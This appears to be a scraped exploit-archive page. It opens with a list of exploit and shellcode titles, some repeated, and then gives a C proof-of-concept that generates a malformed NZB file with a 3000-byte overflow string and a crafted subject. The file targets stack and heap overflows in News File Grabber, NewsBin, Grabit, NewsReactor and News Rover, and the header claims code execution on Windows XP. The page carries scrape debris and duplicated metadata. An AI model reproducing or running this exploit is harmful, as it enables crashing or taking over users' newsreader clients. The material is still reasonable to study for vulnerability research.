
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
149 lines
No EOL
6.2 KiB
C
149 lines
No EOL
6.2 KiB
C
// source: https://www.securityfocus.com/bid/22617/info
|
|
|
|
News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
|
|
|
|
Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.
|
|
|
|
This issue affects version 4.1.0.1; other versions may also be affected.
|
|
|
|
/*********************************************************************************************\
|
|
*
|
|
*
|
|
* NZB Generic 0Day DoS Exploit
|
|
*
|
|
* Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor
|
|
and News Rover *
|
|
*
|
|
*
|
|
*
|
|
*
|
|
* Bugs in News Rover <=12.1 Rev 1:
|
|
*
|
|
* There's a stack overflow in RoverNZB triggered by files that contains a
|
|
long subject. *
|
|
* There's a stack overflow in NewsRover triggered by files that contains a
|
|
long group. *
|
|
* To trigger: run file.nzb
|
|
*
|
|
* Impact: Code execution on Windows XP, SP1 and SP2
|
|
*
|
|
*
|
|
*
|
|
* Bug in News File Grabber 4.1.0.1:
|
|
*
|
|
* If the subject field contains a new line, the app will try to exec data in
|
|
memory. But *
|
|
* since the address changed every time the app runs it's very hard to
|
|
exploit. However I *
|
|
* sometimes got EIP overwritten by my chars
|
|
*
|
|
* To trigger: load file.nzb and start download. CPU -> 100% and then Out of
|
|
Memory error. *
|
|
* Impact: Code execution on Windows XP, SP1 and SP2
|
|
*
|
|
*
|
|
*
|
|
* Bug in Grabit 1.5.3:
|
|
*
|
|
* Grabit does not correctly handle fields that contains a semicolon.
|
|
*
|
|
* To trigger: Just grab the file
|
|
*
|
|
* Impact: DoS
|
|
*
|
|
* Note: Grabit 1.6 is not affected.
|
|
*
|
|
*
|
|
*
|
|
* Bug in NewsReactor:
|
|
*
|
|
* There's a heap overflow that occurs when group field is too long.
|
|
*
|
|
* To trigger: load file.nzb, click grab. After a few tries to get the file
|
|
it crashes. *
|
|
* Impact: Code execution on Windows XP, SP1 and DoS on SP2
|
|
*
|
|
*
|
|
*
|
|
* Bug in NewsBin Pro 4.3.2:
|
|
*
|
|
* There's a heap overflow that occurs when group field is too long.
|
|
*
|
|
* To trigger: load file.nzb, and start download. The app should then be
|
|
unstable. *
|
|
* Impact: Code execution on Windows XP, SP1 and DoS on SP2
|
|
*
|
|
*
|
|
*
|
|
* Bug in NewsBin Pro 5.33 (maybe others...):
|
|
*
|
|
* There's a heap overflow that occurs when group field is too long.
|
|
*
|
|
* To trigger: load file.nzb, and start download. Then click "Delete All
|
|
Posts". Boom! *
|
|
* Impact: Code execution on Windows XP, SP1 and DoS on SP2
|
|
*
|
|
* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad
|
|
chars and with the *
|
|
* stack protection I didn't find a way to jump to a good return address.
|
|
*
|
|
*
|
|
*
|
|
* Solution: Buy your dvds leecha!!!
|
|
*
|
|
*
|
|
*
|
|
*
|
|
*
|
|
* Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr>
|
|
*
|
|
* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P
|
|
*
|
|
\*********************************************************************************************/
|
|
|
|
#include "stdlib.h"
|
|
#include "stdio.h"
|
|
#include "string.h"
|
|
|
|
char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
|
|
"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\"
|
|
\"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
|
|
"<!-- NZB Generated by MarsupilamiPowa -->\n"
|
|
"<nzb xmlns=\"MarsupilamiPowa@hotmail.fr\">\n\n";
|
|
|
|
|
|
char nzbend[]="</segment>\n"
|
|
"</segments>\n"
|
|
"</file>\n"
|
|
"</nzb>\n";
|
|
|
|
|
|
|
|
int main(int argc, char* argv[]) {
|
|
|
|
FILE *file;
|
|
char * pad;
|
|
|
|
printf("MarsupilamiPowa's Generic NZB DoS Exploit\n");
|
|
|
|
file=fopen("file.nzb","wb");
|
|
|
|
fprintf(file,nzbheader);
|
|
fprintf(file,"<file poster=\"Marsu\n");
|
|
fprintf(file,"\" date=\"1170609233\"\nsubject=\"hello bug");
|
|
fprintf(file,"\">\n");
|
|
fprintf(file,"<groups><group>");
|
|
|
|
pad = (char*)malloc(sizeof(char)*3000);
|
|
memset(pad,'A',3000);
|
|
fprintf(file,pad);
|
|
fprintf(file,"</group></groups>\n<segments>\n<segment bytes=\"30\"
|
|
number=\"1\">");
|
|
fprintf(file,"\n;\n");
|
|
fprintf(file,nzbend);
|
|
fclose(file);
|
|
|
|
printf("file.nzb generated! Have fun\n");
|
|
return 0;
|
|
|
|
} |